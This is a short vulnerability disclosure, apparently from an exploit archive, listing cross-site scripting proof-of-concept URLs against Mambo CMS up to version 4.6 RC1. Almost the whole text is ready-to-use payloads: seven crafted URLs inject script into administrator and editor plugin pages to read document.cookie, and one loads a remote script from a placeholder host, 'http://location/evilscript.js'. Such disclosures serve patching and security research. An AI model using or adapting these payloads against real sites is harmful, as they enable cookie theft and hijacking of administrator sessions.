Mambo versions less than or equal to 4.6 suffer from XSS.
2a92e4b2da24b9b0737a34466de761cfd9f30d723b93153b805ecb310a8996b8
Mambo <= 4.6. RC1 Cross Site Scripting
---------------------------------------
http://[target]/[path_to_mambo]/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/popupImage.php?img_title=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?cur_colour=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?func=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?block=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location/evilscript.js
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
---------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
---------------------------------------